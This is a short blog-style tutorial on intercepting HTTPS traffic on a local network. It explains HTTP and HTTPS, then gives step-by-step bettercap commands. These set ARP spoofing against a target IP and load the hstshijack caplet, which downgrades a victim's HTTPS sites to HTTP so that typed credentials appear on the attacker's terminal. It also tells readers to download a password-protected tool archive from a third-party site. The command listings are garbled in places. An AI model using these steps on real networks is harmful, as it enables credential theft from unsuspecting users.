In this article I’m going to teach you how to bypass HTTPS website. before that we should know HTTP and HTTPS.
HTTP stands for Hypertext Transfer Protocol, and it is a protocol – or a prescribed order and syntax for presenting information – used for transferring data over a network. Most information that is sent over the Internet, including website content and API calls, uses the HTTP protocol. There are two main kinds of HTTP messages: requests and responses
Hypertext transfer protocol secure (HTTPS) is the secure version of HTTP, which is the primary protocol used to send data between a web browser and a website. HTTPS is encrypted in order to increase security of data transfer. This is particularly important when users transmit sensitive data, such as by logging into a bank account, email service, or health insurance provider.
Now we clarify that HTTPS websites more secure form HTTP websites but we can easily bypass
Difference between the HTTP and HTTPS?
HTTPS is HTTP with encryption. The only difference between the two protocols is that HTTPS uses TLS (SSL) to encrypt normal HTTP requests and responses. As a result, HTTPS is far more secure than HTTP. A website that uses HTTP has http:// in its URL, while a website that uses HTTPS has https://
How to Bypass HTTPS website?
Step 1:
First you need to download Bypass HTTPS website tool so click this below download button
Once you download then extract with the password of www.errorsfind.com
Step 2:
Now copy hstshjack folder and past to bettercap couplets location. I show the exact location seeing below
/usr/share/bettercap/caplets/ First you open bettercap caplets folder > and open your terminal on that place > then type this below command on your terminal
sudo rm -rf htshjack
How to move hstshjack in bettercap caplets folder?
First you will open your terminal on your new htshjack folder place > then type this below command on your terminal
sudo cp -r hstshijack /usr/share/bettercap/caplets/
Step 3:
Now create custom spoofing text file just copy this below all command’s and save the extension should be cap
net.probe onnet.recon onset arp.spoof.fullduplex trueset arp.spoof.targets 172.20.10.8arp.spoof onset net.sniff.local truenet.sniff on If true it will consider packets from/to this computer, otherwise it will skip them.
Step 4:
Now start the bettercap with bettercap custom script so type this below command on your terminal
sudo bettercap -iface wlan0 -caplet (your custom text file ) 
Step 5:
Now we need to start https bypassing. so first we will need to set cuplets so type this below command on your bettercap terminal
caplets.show 
HTTPS Bypassing
This is an Alert
This hack will not work if your victim repeatedly open his browser because that browser capture some website cookies so clear that.
Step 6:
Now choose hstshijack caplet so type this below command on your bettercap terminal.
hstshijack/hstshijack 
That’s it. Now your victim type any credentials on https website that will show on your bettercap terminal.
NOTE
After enabling hstshijack caplet your victim all websites redirect https to http
إرسال تعليق